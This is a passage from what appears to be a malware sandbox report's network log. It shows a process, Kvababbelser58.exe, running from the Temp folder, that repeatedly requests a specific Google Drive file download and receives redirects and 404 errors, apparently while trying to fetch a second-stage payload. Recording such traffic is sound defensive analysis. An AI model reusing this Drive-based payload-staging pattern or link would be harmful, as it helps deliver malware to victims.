                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:18 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 4e 33 36 70 77 6f 54 48 62 31 51 42 41 38 75 67 6c 6a 5f 37 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UN36pwoTHb1QBA8uglj_7Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      16192.168.2.749985216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:18 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:19 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:19 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-Wv2czfAXnq_hGGIGBLt6mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      17192.168.2.749986142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:19 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:20 UTC1851INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFiumC4W-PVQDL-jgQUUylJOI_Tj1OUiaClqmguwEUy5V4hShk0PUOZMYIPL5Pe8wsSPhR4W_55R1ao
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:20 GMT
                                                                                                      Content-Security-Policy: script-src 'nonce-ncOZ6G1kr-wOiby_Juahrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:20 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 41 65 56 64 57 71 4f 45 35 6b 6e 30 4d 79 32 69 54 37 67 35 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_AeVdWqOE5kn0My2iT7g5A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      18192.168.2.749987216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:21 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:21 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:21 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: script-src 'nonce-PnIElex_1Th8qVJ1whOcYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      19192.168.2.749988142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:22 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:22 UTC1844INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFiumC7kDl5kbcTA_lYeED2GMuqhKErebsSp3V5g69tQ69pXZ4YZO95TUh-Zzc2WEWnX8l6s
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:22 GMT
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-owwaFKU0NfiAYmjiDikvog' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:22 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 53 4f 65 71 63 49 5a 54 75 30 30 49 69 66 62 48 77 46 63 44 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2SOeqcIZTu00IifbHwFcDA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      20192.168.2.749989216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:23 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:23 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:23 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: script-src 'nonce-L8Kk5AwCpvzaWUzqfguhTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      21192.168.2.749990142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:24 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:25 UTC1844INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFiumC465sMTDEp3ooA4mTwWWXoSiJ0rumossrJ9iSeAZ1RTFaEuZex8ub0vpAGfwamMrreb
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:24 GMT
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: script-src 'nonce-p5EoMlXxSrcDjMDtk6uGgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:25 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 73 38 62 32 30 62 74 4f 6e 39 59 4f 31 68 72 63 69 4d 79 73 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ps8b20btOn9YO1hrciMysw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      22192.168.2.749991216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:25 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:26 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:26 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-ZVTFLfJ4PNgdraFcjkKquQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
